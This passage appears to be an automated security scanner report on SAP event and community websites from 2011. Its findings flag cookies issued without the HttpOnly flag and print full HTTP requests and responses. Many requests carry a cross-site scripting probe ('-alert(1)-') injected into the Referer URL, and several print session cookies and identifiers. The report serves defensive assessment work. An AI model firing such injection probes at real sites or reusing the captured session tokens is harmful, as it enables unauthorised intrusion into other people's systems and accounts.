var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]="
...[SNIP]...
12.126. http://www.sapvirtualevents.com/js/clear-form.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/clear-form.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/clear-form.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "05cb183771cc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Mon, 12 Sep 2011 10:31:14 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 3046

function initPage()
{
   clearFormFields({
       clearInputs: true,
       clearTextareas: false,
       passwordFieldText: true,
       addClassFocus: "focus",
       filterClass: "default"
   });
}
function clearForm
...[SNIP]...
12.127. http://www.sapvirtualevents.com/js/form.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/form.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/form.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "09f308f8156cc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Tue, 09 Aug 2011 10:46:14 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 17791

var _selectHeight = 20;

var inputs = new Array();
var selects = new Array();
var labels = new Array();
var radios = new Array();
var radioLabels = new Array();
var checkboxes = new Array();
v
...[SNIP]...
12.128. http://www.sapvirtualevents.com/js/html5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/html5.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/html5.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 1489

// html5shiv MIT @rem remysharp.com/html5-enabling-script
// iepp v1.6.2 MIT @jon_neal iecss.com/print-protector
/*@cc_on(function(m,c){var z="abbr|article|aside|audio|canvas|details|figcaption|figu
...[SNIP]...
12.129. http://www.sapvirtualevents.com/js/jquery-1.4.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.4.4.min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 78601

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
12.130. http://www.sapvirtualevents.com/js/jquery-jtemplates.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/jquery-jtemplates.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-jtemplates.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 9708

/* jTemplates 0.7.8 (http://jtemplates.tpython.com) Copyright (c) 2009 Tomasz Gloc */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.t
...[SNIP]...
12.131. http://www.sapvirtualevents.com/js/jquery_.main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/jquery_.main.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery_.main.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:16 GMT
Accept-Ranges: bytes
ETag: "0322fc6cb5ccc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Wed, 17 Aug 2011 10:52:36 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 9233

$(document).ready(function(){
   footerDrop();
   initLightBox();
   initPopups();
});
function initLightBox(){
   var _speed = 300;
   var _ieVersion = 7;
   var _opener = $('a.lightbox-opener');
   var _
...[SNIP]...
12.132. http://www.sapvirtualevents.com/js/json2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/json2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/json2.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 17346

/*
http://www.JSON.org/json2.js
2011-02-23

Public Domain.

NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.

See http://www.JSON.org/js.html


This code should be minified before de
...[SNIP]...
12.133. http://www.sapvirtualevents.com/js/mtagconfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/mtagconfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mtagconfig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "0aee323306acc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Sat, 03 Sep 2011 11:53:48 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 2891

var lpMTagConfig=lpMTagConfig||{};lpMTagConfig.vars=lpMTagConfig.vars||[];lpMTagConfig.dynButton=lpMTagConfig.dynButton||[];lpMTagConfig.lpProtocol=document.location.toString().indexOf("https:")==0?"h
...[SNIP]...
12.134. http://www.sapvirtualevents.com/js/securelayers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/securelayers.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/securelayers.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 6507


var frame_id = "layer-frame";
var _callback_handler = null;
var _warning_dialog = null;
var dialog_id = "layer-dialog";


/* ===== DIALOG HANDLERS ===== */


// NO DIALOG
function no_dia
...[SNIP]...
12.135. http://www.sapvirtualevents.com/js/slideBlock.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/slideBlock.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/slideBlock.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:16 GMT
Accept-Ranges: bytes
ETag: "0448eadc267cc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Wed, 31 Aug 2011 09:45:12 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 2452

// page init
//jQuery(function(){
//    initOpenClose();
//});

// open-close init
function initOpenClose() {

   jQuery('div.slide-block').OpenClose({
       activeClass:'active',
       opener:'a.open-c
...[SNIP]...
12.136. http://www.sapvirtualevents.com/js/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/thickbox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/thickbox.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "08b69bb4366cc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Mon, 29 Aug 2011 12:03:58 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 15509

.../*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licens
...[SNIP]...
12.137. http://www.sapvirtualevents.com/js/timetable.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/timetable.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/timetable.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:16 GMT
Accept-Ranges: bytes
ETag: "0dcc0f8ec6dcc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Thu, 08 Sep 2011 06:03:04 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 16340

...//timetable.js -- modified as per new requirement on 01-May
//all the sessions scheduled must be ordered by starttime
var timearrow = "<img id='imgArrow' src='App_Themes/Default/images/bullet8.gi
...[SNIP]...
12.138. http://www.sapvirtualevents.com/js/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "0d7e2236dcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Wed, 07 Sep 2011 05:57:22 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 7861

...function getStartTimeTSArray(result) {
//var tsarr = eval(result);
var arr = new Array();
for (var i = 0; i < result.d.SessionsList.length; i++) {
arr.push(result.d.Sessions
...[SNIP]...
12.139. http://www.sapvirtualevents.com/js/vscrollarea.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/vscrollarea.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/vscrollarea.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 17048

var VSA_scrollAreas = new Array();

var VSA_default_imagesPath = "App_Themes/Default/images";
var VSA_default_btnUpImage = "button-up.gif";
var VSA_default_btnDownImage = "button-down.gif";
var V
...[SNIP]...
12.140. http://www.sapvirtualevents.com/teched  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /teched HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=UTF-8
Date: Sat, 15 Oct 2011 14:30:11 GMT
Location: http://www.sapvirtualevents.com/teched/
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 162

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.sapvirtualevents.com/teched/">here</a></body>
12.141. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/gif
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
SDN_RES_KEY: /webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd
Content-Length: 379
Content-Disposition: inline; filename="button_getthis.gif"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:02 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE3414700)3414750; Version=1; Path=/; HttpOnly
Set-Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; Domain=.sdn.sap.com; Expires=Thu, 02-Nov-2079 17:38:09 GMT; Path=/
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; Domain=www.sdn.sap.com; Path=/irj/scn
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; Version=1; Path=/; HttpOnly
Set-Cookie: SDNSTATE=392433836.14340.0000; path=/

GIF89aB......x.....Yx.0ASo........^.......o.....i........@Vn...............n.....n..........................!.......,....B.......%.di.h..l..ouU2!....$a.....+.d4.M6.....EBAE...t;.X...e..(/.Js.0,D..I..
...[SNIP]...
12.142. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/png
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODUzN0YtMTA0ODhGMTcyNkMzRTlCNg==
SDN_RES_KEY: /webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154
Content-Length: 1184
Content-Disposition: inline; filename="flickr.png"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:35 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODUzN0YtMTA0ODhGMTcyNkMzRTlCNg==; Domain=www.sdn.sap.com; Path=/irj/sdn
Set-Cookie: PortalAlias=sdn; Path=/

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx..UKo.E....g..../;.....8..#L....S. rB...........D.\QN.!...H..A.,.[..DX.B@.s.^.sv.=Mu...#$..wG.3[.U.W_U.........
7...c..!.
...[SNIP]...
12.143. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
